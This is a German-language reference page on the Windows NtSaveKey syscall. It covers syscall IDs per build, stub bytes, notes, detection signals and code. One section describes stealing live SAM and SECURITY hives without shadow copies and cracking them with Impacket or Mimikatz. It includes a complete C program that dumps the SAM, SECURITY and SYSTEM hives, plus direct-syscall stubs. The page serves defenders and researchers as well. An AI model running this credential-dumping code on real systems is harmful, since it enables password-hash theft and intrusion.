NtSaveKey
Schreibt einen lebenden Registry-Schlüssel (mitsamt Teilbaum) in eine Hive-Datei — die Kernel-Seite des SAM/SECURITY-Diebstahls.
Prototyp
NTSTATUS NtSaveKey( HANDLE KeyHandle, HANDLE FileHandle );
Argumente
| Name | Type | Dir | Description |
|---|---|---|---|
| KeyHandle | HANDLE | in | Geöffnetes Handle auf den Quellschlüssel (KEY_QUERY_VALUE erforderlich; der gesamte Teilbaum wird erfasst). |
| FileHandle | HANDLE | in | Geöffnetes Handle auf die Zieldatei (mit GENERIC_WRITE auf einer leeren/neuen Datei geöffnet). |
Syscall-IDs pro Windows-Version
| Windows-Version | Syscall-ID | Build |
|---|---|---|
| Win10 1507 | 0x167 | win10-1507 |
| Win10 1607 | 0x16F | win10-1607 |
| Win10 1703 | 0x175 | win10-1703 |
| Win10 1709 | 0x178 | win10-1709 |
| Win10 1803 | 0x17A | win10-1803 |
| Win10 1809 | 0x17B | win10-1809 |
| Win10 1903 | 0x17C | win10-1903 |
| Win10 1909 | 0x17C | win10-1909 |
| Win10 2004 | 0x182 | win10-2004 |
| Win10 20H2 | 0x182 | win10-20h2 |
| Win10 21H1 | 0x182 | win10-21h1 |
| Win10 21H2 | 0x184 | win10-21h2 |
| Win10 22H2 | 0x184 | win10-22h2 |
| Win11 21H2 | 0x18C | win11-21h2 |
| Win11 22H2 | 0x18F | win11-22h2 |
| Win11 23H2 | 0x18F | win11-23h2 |
| Win11 24H2 | 0x191 | win11-24h2 |
| Server 2016 | 0x16F | winserver-2016 |
| Server 2019 | 0x17B | winserver-2019 |
| Server 2022 | 0x18A | winserver-2022 |
| Server 2025 | 0x191 | winserver-2025 |
Kernel-Modul
Verwandte APIs
Syscall-Stub
4C 8B D1 mov r10, rcx B8 91 01 00 00 mov eax, 0x191 F6 04 25 08 03 FE 7F 01 test byte ptr [0x7FFE0308], 1 75 03 jne short +3 0F 05 syscall C3 ret CD 2E int 2Eh C3 ret
Undokumentierte Hinweise
NtSaveKey serialisiert einen lebenden Registry-Schlüssel mit komplettem Teilbaum in eine Datei im Hive-Format. Die Ausgabedatei ist ein *vollwertiges Hive*: byte-kompatibel mit den On-Disk-Dateien SAM, SYSTEM, SECURITY. Der Caller benötigt **SeBackupPrivilege**. NtSaveKey ist die Originalversion; `NtSaveKeyEx` fügt einen Flags-Parameter hinzu (`REG_STANDARD_FORMAT` vs `REG_LATEST_FORMAT`). Win32-Wrapper sind `RegSaveKeyW` / `RegSaveKeyExW`.
Häufige Malware-Nutzung
Dies ist der **kanonische Weg ohne VSS, um Live-SAM- und SECURITY-Hives zu stehlen**: `HKLM\SAM` und `HKLM\SECURITY` öffnen (erfordert SYSTEM-Rechte oder Impersonation) und dann per NtSaveKey an einen beschreibbaren Ort wegspeichern. Die entstehenden Dateien werden anschließend mit `secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL` (Impacket) oder Mimikatz `lsadump::sam` weiterverarbeitet, um NTLM-Hashes, DPAPI-Master-Keys, gecachte Domänen-Credentials und LSA-Secrets zu extrahieren — *ohne* dass eine Volume Shadow Copy erstellt werden müsste (die stark überwacht ist). Impackets `reg.py save` ist genau diese Primitive über RemoteRegistry/SMB. SeBackupPrivilege selbst ist der Bypass — es überschreibt DACLs beim Lesen, sodass selbst Schlüssel, die der lokalen Administratoren-Gruppe ausdrücklich verweigert sind, lesbar werden.
Erkennungsmöglichkeiten
Sysmon Event 11 (FileCreate) auf Hive-Format-Dateien außerhalb von `%SystemRoot%\System32\config\` ist das verlässlichste Signal — kombiniert mit Events 13 / 12 auf Öffnen von `HKLM\SAM` oder `HKLM\SECURITY` unmittelbar davor. ETW `Microsoft-Windows-Kernel-Registry` liefert explizite Save-Hive-Events mit Quellschlüssel und Zielpfad. Aktivierung von SeBackupPrivilege (Sysmon 4673 mit `SeBackupPrivilege` in der Privilegienliste) durch einen Nicht-Backup-Prozess ist hochaussagekräftig. `reg.exe save HKLM\SAM` und PowerShell-Äquivalente erkennen, und auf jeden SYSTEM-prozess-geschriebenen Hive-Magic-Header (`regf`) außerhalb der Config-Verzeichnisse achten.
Direkte Syscall-Beispiele
asmx64 direct stub (Win11 24H2)
; Direct syscall stub for NtSaveKey (SSN 0x191 on Win11 24H2 — drifts per build)
NtSaveKey PROC
mov r10, rcx ; KeyHandle
mov eax, 191h ; SSN
syscall
ret
NtSaveKey ENDPcLive SAM/SECURITY extraction skeleton
// Dump SAM and SECURITY hives without touching Volume Shadow Copy.
// Requires SYSTEM context AND SeBackupPrivilege enabled.
#include <windows.h>
static BOOL EnableBackupPriv(void) {
HANDLE tok; TOKEN_PRIVILEGES tp = {0};
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES, &tok)) return FALSE;
LookupPrivilegeValueW(NULL, SE_BACKUP_NAME, &tp.Privileges[0].Luid);
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
BOOL ok = AdjustTokenPrivileges(tok, FALSE, &tp, 0, NULL, NULL)
&& GetLastError() == ERROR_SUCCESS;
CloseHandle(tok);
return ok;
}
LONG DumpHive(LPCWSTR root, LPCWSTR outPath) {
HKEY hKey = NULL;
LONG s = RegOpenKeyExW(HKEY_LOCAL_MACHINE, root,
REG_OPTION_BACKUP_RESTORE, KEY_READ, &hKey);
if (s != ERROR_SUCCESS) return s;
DeleteFileW(outPath);
s = RegSaveKeyExW(hKey, outPath, NULL, REG_LATEST_FORMAT);
RegCloseKey(hKey);
return s;
}
int wmain(void) {
if (!EnableBackupPriv()) return 1;
DumpHive(L"SAM", L"C:\\stage\\SAM.hiv");
DumpHive(L"SECURITY", L"C:\\stage\\SECURITY.hiv");
DumpHive(L"SYSTEM", L"C:\\stage\\SYSTEM.hiv");
return 0;
}rustDirect NtSaveKey via ntapi
// Cargo: ntapi = "0.4", winapi = { version = "0.3", features = ["winnt", "handleapi"] }
use ntapi::ntregapi::NtSaveKey;
use winapi::shared::ntdef::{HANDLE, NTSTATUS};
unsafe fn save_hive(key: HANDLE, file: HANDLE) -> NTSTATUS {
// Caller is expected to have already enabled SeBackupPrivilege
// and opened `key` with KEY_QUERY_VALUE and `file` with GENERIC_WRITE.
NtSaveKey(key, file)
}MITRE ATT&CK-Mappings
Last verified: 2026-05-20